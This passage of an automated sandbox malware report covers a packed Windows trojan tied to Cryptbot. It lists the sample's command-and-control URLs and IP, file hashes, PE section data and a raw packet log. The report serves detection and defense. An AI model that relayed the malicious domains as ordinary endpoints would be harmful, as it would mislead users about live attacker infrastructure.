| https://curl.se/docs/http-cookies.html | iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1 | iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17 | iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://upx.sf.net | Amcache.hve.5.dr | false | | high |
| https://curl.se/docs/alt-svc.html | iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://.css | iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://.jpg | iuO4kwUi17.exe, 00000000.00000003.1452612410.0000000007896000.00000004.00001000.00020000.00000000.sdmp, iuO4kwUi17.exe, 00000000.00000002.1916917593.0000000000DAD000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514fd4 | iuO4kwUi17.exe, 00000000.00000002.1918748214.0000000001BEE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| 185.121.15.192 | home.fivetk5ht.top | Spain | 207046 | REDSERVICIOES | false |
| 98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578958
Start date and time: 2024-12-20 17:04:49 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: iuO4kwUi17.exe
renamed because original name is a hash value
Original Sample Name: a7e8135cfe118aa459fe0483617fd64e.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@2/5@10/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.12.23.50, 20.190.147.11
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: iuO4kwUi17.exe
| Time | Type | Description |
| 11:06:03 | API Interceptor | 3x Sleep call for process: iuO4kwUi17.exe modified |
| 11:06:42 | API Interceptor | 1x Sleep call for process: WerFault.exe modified |
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.121.15.192nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                  • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  home.fivetk5ht.topnojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                  • 185.121.15.192
                                  h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                  • 185.121.15.192
                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                  No context
                                  No context
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9413483103345184
                                  Encrypted:false
                                  SSDEEP:96:BvFNzKUtsF2hIGhpJfZQXIDcQvc6QcEVcw3cE/H+HbHg/8BRTf3Oy1oVazW0dPtP:ZG8A0BU/Aju0ZrPMtwzuiFyZ24IO8O
                                  MD5:D29B25B4A684A4628BEEF3F397FF5058
                                  SHA1:9F51A5C6CFF88B2EAD1526E2F7BF99B7051BE3CD
                                  SHA-256:14214E1B68811A53641F6584A195FCBD2702B7EB2531EAC424181A9C82B304FD
                                  SHA-512:725D2EED9DF7729E2A9439ECA021B7580F574C98758757EE9744A9892C4BE70C9C0AE9C131A04E5D334C83D3A22BE4D8FEA989150BF281321D08AB4AF3E5F909
                                  Malicious:true
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.4.3.6.9.5.3.9.1.9.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.4.3.7.1.0.7.0.4.4.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.0.c.d.2.e.e.-.4.9.1.d.-.4.e.d.1.-.b.c.a.f.-.5.2.d.0.d.a.5.d.1.2.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.4.6.e.8.f.0.-.3.2.a.f.-.4.f.7.c.-.a.e.2.f.-.3.c.d.4.c.b.3.7.b.9.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.i.u.O.4.k.w.U.i.1.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.0.-.0.0.0.1.-.0.0.1.3.-.1.3.6.a.-.f.3.0.c.f.9.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.0.a.3.4.b.f.f.e.5.0.4.3.2.3.a.2.5.2.9.7.3.5.3.4.e.0.4.6.f.4.6.0.0.0.0.f.f.f.f.!.0.0.0.0.0.3.5.0.9.b.6.b.6.a.9.e.1.5.8.b.c.7.a.6.a.e.8.9.f.2.1.f.0.0.5.7.e.5.1.1.5.e.c.d.!.i.u.O.4.k.w.U.i.1.7...e.x.e.....T.a.r.g.e.t.A.p.p.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Fri Dec 20 16:06:10 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):213692
                                  Entropy (8bit):1.4358183529907513
                                  Encrypted:false
                                  SSDEEP:384:jATL/zrEqwXm9tY1jn/3HivzJSJe5OG5tYVWZB/iy7qqhj3YGeE3:+L/zrEqVAlnPHUzuSOG5tYWBKmLYjS
                                  MD5:BF11BF4D759C5493D8D6B20827335F30
                                  SHA1:5071F2CCA767ADCE25D726A1273933D3DC5A991A
                                  SHA-256:2CE375105A8CB4BD49F4AE274FE73911B24096C484CF39159C1C2B09A02A1380
                                  SHA-512:310EAC102F418EADE20C9C3B1BD3DD2E3278B6956F29ED9107B8F7DE7F31F71D99496776AB71936BFC4C33286976C1431695DBA50B945B12C6CC11D9248C9991
                                  Malicious:false
                                  Reputation:low
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8354
                                  Entropy (8bit):3.697485304627131
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJtE6g6YWRSU9Ogmfkb+WprW89bXlsf79m:R6lXJ+6g6YwSU9Ogmfkb7X+fM
                                  MD5:0BAA1A04369FBF1B653D450F57E6D8C5
                                  SHA1:DE2C8717177AA7C9BA5E36A85CFF4A32A0F5B88A
                                  SHA-256:3C2535585526B2F9EBCAFA2F01F85460F416C675EA3A4740A11FCC7E2D503FC7
                                  SHA-512:A3A13C1A013973EBF8F365FEABCF27F49C720B05C0664615DFC019DD35808EFFFFCE30895ED8A9F50CE1985F9B73D3DFD5BA3F041107C013052FDB93DE5340D2
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4594
                                  Entropy (8bit):4.469877622454593
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsdJg77aI9dKWpW8VYxYm8M4JcAL5FTj+q8RUkaTzzvzEd:uIjf3I7Dr7VxJcAvMdaTzzvzEd
                                  MD5:77E79CD785E75739F6852BE5A6B65F01
                                  SHA1:613D56D85DF1FE3ED5DE7F0CEB9B24BCD8ACA036
                                  SHA-256:C5FDC820BBA647D12BC57FF8AD03E758D2A640B399C8B73904789087EB64B110
                                  SHA-512:916B89430172E1F100D13B98265C69A3E02E15A998DFD38D31A0B0AE48B683CC1A713C296CEEE8B3567CF33CA1567276F503A157A16007C385212970E8EA7354
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639788" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.295977627166649
                                  Encrypted:false
                                  SSDEEP:6144:B41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+BrmBMZJh1Vj7:21/YCW2AoQ0NinrwMHrVP
                                  MD5:C3AEC0B4CB75D46F8D4F8A56A5294B94
                                  SHA1:AA6F5988247425AB9127B381B9E7C6E5972AA70F
                                  SHA-256:8A142314334BF177544F48B166AF439F68874EF012D9EBC130BEAF681BC74C4A
                                  SHA-512:3355451A2B57679837BA786254BF695C6B1415A2350EE9AFB04893BEB35CE7C94C456DBF6D5AB47EDBDC5303EA9A0319FA833F8E724A015F9C27A4AD5C5AC094
                                  Malicious:false
                                  Reputation:low
                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                  Entropy (8bit):7.985742216127058
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • VXD Driver (31/22) 0.00%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:iuO4kwUi17.exe
                                  File size:4'480'000 bytes
                                  MD5:a7e8135cfe118aa459fe0483617fd64e
                                  SHA1:03509b6b6a9e158bc7a6ae89f21f0057e5115ecd
                                  SHA256:97f25927cea71bfcdac5e7755682aea36429ea3eb3accfc64ecdfc9db1d8006b
                                  SHA512:c2245cad2cac25e27c0b3e4a198e6d6a51f9f7f6b1e6fbf415ced7b8630956c985dfea7a2493fd03a532a3acc2f5238edcf68789d7387f9291461e7450cf44de
                                  SSDEEP:98304:giDWNEXknXg6uZL21BrRDjEMbNkehTQ4DURbaUOj:ovfCEvtQpOj
                                  TLSH:C92633B63D78FD4AD34828B5870C4F1A46FB18889DEAFB959CF4ADD55BC2042B30D162
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...........pH...@.................................~DE...@... ............................
                                  Icon Hash:90cececece8e8eb0
                                  Entrypoint:0x1099000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                  DLL Characteristics:DYNAMIC_BASE
                                  Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007F9308B2A68Ah
                                  | Name | Virtual Address | Virtual Size | Is in Section |
                                  | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74705f | 0x73 | .idata |
                                  | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x746000 | 0x1ac | .rsrc |
                                  | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc971e8 | 0x10 | lvvpaogd |
                                  | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_TLS | 0xc97198 | 0x18 | lvvpaogd |
                                  | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
                                  | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
                                  | Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                                  | | 0x1000 | 0x745000 | 0x284c00 | ad72b901e60c808fedb8d0753677fc6d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                  | .rsrc | 0x746000 | 0x1ac | 0x200 | 56f133aca40f5e243fb6573abe811775 | False | 0.578125 | data | 4.52213224511641 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                  | .idata | 0x747000 | 0x1000 | 0x200 | e84636d45557e74dadd0f14f36394655 | False | 0.166015625 | data | 1.1471680400846989 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                  | | 0x748000 | 0x392000 | 0x200 | 018b880a1061fd93f4282364f36ced6b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                  | lvvpaogd | 0xada000 | 0x1be000 | 0x1bd400 | 137215bfa86c1076147068ef91167d03 | False | 0.994559543444694 | data | 7.956161259145636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                  | aoltjaey | 0xc98000 | 0x1000 | 0x400 | d1964faf8532c051aa769e9f1eb73ce5 | False | 0.7197265625 | data | 5.874911030800955 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                  | .taggant | 0xc99000 | 0x3000 | 0x2200 | daa5bada12478354dc6607fdc70a5226 | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                  | Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
                                  | RT_MANIFEST | 0xc971f8 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |
                                  | DLL | Import |
                                  | kernel32.dll | lstrcpy |
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Dec 20, 2024 17:06:04.535743952 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.535783052 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.535887957 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536094904 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536205053 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536210060 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536340952 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536345959 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536355972 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536669016 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536673069 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536683083 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536708117 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.536735058 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:04.536823988 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:04.537034035 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537069082 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537074089 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537125111 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537128925 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537138939 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537271023 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537276030 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537285089 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537503004 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537584066 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537703037 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537707090 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537801981 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537884951 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537889957 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.537894011 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538018942 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538022995 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538131952 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538136005 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538372040 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538376093 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538527012 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538533926 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538652897 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538656950 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538783073 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538788080 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538832903 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538837910 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.538933039 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539027929 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539031982 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539041042 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539124012 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539176941 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539180994 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539324045 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539329052 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539380074 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539491892 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539495945 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539525032 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539696932 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539701939 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539705992 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539753914 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.539975882 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:04.540071011 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:04.582005024 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.582274914 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:04.582607985 CET4970480192.168.2.10185.121.15.192
                                  Dec 20, 2024 17:06:04.656563044 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.656573057 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.656697035 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.656702042 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.656796932 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.656810999 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.656996965 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657056093 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657083035 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657140970 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657200098 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657205105 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657279968 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657377958 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657392025 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657401085 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657461882 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657565117 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657572031 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657664061 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657721043 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657823086 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657828093 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657833099 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657919884 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.657928944 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658005953 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658082962 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658087015 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658096075 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658170938 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658188105 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658274889 CET8049704185.121.15.192192.168.2.10
                                  Dec 20, 2024 17:06:04.658279896 CET8049704185.121.15.192192.168.2.10
